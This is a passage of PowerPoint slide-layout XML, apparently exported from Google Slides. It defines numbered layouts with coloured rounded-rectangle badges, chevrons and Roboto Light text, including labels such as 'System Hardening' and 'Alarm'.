            <a:off x="175" y="213537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2" name="Google Shape;452;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178975" y="2573363"/>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3" name="Google Shape;453;p36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="454" name="Google Shape;454;p36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2129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04</a:t>
              </a:r>
              <a:endParaRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="455" name="Google Shape;455;p36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="333375" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="2129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56" name="Google Shape;456;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2573500"/>
            <a:ext cx="88821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57" name="Google Shape;457;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179038" y="1258884"/>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8" name="Google Shape;458;p36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="459" name="Google Shape;459;p36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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01</a:t>
              </a:r>
              <a:endParaRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="460" name="Google Shape;460;p36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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1" name="Google Shape;461;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1259000"/>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2" name="Google Shape;462;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178925" y="1696988"/>
            <a:ext cx="76911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63" name="Google Shape;463;p36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="464" name="Google Shape;464;p36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="465" name="Google Shape;465;p36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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6" name="Google Shape;466;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1697125"/>
            <a:ext cx="8869800" cy="377100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="13716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24. Numbered 1–3 (Green)">
  <p:cSld name="CUSTOM_2_7_1_5">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 467"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Google Shape;468;p3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69" name="Google Shape;469;p3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70" name="Google Shape;470;p3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71" name="Google Shape;471;p3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72" name="Google Shape;472;p3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73" name="Google Shape;473;p3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4" name="Google Shape;474;p37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="475" name="Google Shape;475;p37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F7EF6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01</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="476" name="Google Shape;476;p37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F7EF6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7" name="Google Shape;477;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275"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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275"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79" name="Google Shape;479;p37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3305156" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="480" name="Google Shape;480;p37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AFCA5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02</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="481" name="Google Shape;481;p37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AFCA5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2" name="Google Shape;482;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3572250" y="193777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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572250" y="193783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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="484" name="Google Shape;484;p37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="1345853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="485" name="Google Shape;485;p37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4FA78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latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="486" name="Google Shape;486;p37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4FA78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7" name="Google Shape;487;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1938525"/>
            <a:ext cx="2428500" cy="26628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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1938587"/>
            <a:ext cx="2371500" cy="2662800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t"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25. Numbered 1–2 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_5_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 489"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286275" y="649650"/>
            <a:ext cx="827450" cy="4115237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Google Shape;491;p3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492" name="Google Shape;492;p3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493" name="Google Shape;493;p3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494" name="Google Shape;494;p3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495" name="Google Shape;495;p38"/>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6" name="Google Shape;496;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="160245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497" name="Google Shape;497;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936274" y="890150"/>
            <a:ext cx="2688300" cy="476700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C8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System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Google Shape;498;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5072469" y="1278938"/>
            <a:ext cx="261029" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C8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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457246" y="887925"/>
            <a:ext cx="2688300" cy="4767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Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Google Shape;500;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="575363" y="1276701"/>
            <a:ext cx="226486" cy="144694"/>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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="12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26. Numbered 1–5 (Grey)">
  <p:cSld name="CUSTOM_2_7_1_5_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 502"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Google Shape;503;p3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4" name="Google Shape;504;p3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05" name="Google Shape;505;p3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06" name="Google Shape;506;p3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07" name="Google Shape;507;p3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08" name="Google Shape;508;p3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09" name="Google Shape;509;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="12527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01</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Google Shape;510;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190550" y="12765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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133475" y="12765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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457188" y="196237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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="876063" y="196237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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7934400" y="193852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02</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2622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03</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Google Shape;516;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="2646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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="2646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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="514338" y="3408225"/>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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="933213" y="3408225"/>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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7991550" y="3384375"/>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04</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="Google Shape;521;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="4095388"/>
            <a:ext cx="790500" cy="638400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Google Shape;522;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="4119238"/>
            <a:ext cx="7477200" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="4119238"/>
            <a:ext cx="7115400" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 5000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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="1267550"/>
            <a:ext cx="7434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5" name="Google Shape;525;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1944963"/>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algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="526" name="Google Shape;526;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="264817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7" name="Google Shape;527;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="3394650"/>
            <a:ext cx="9144000" cy="590700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="1554475" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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8" name="Google Shape;528;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="4119225"/>
            <a:ext cx="9168600" cy="5907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extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>
          </p15:clr>
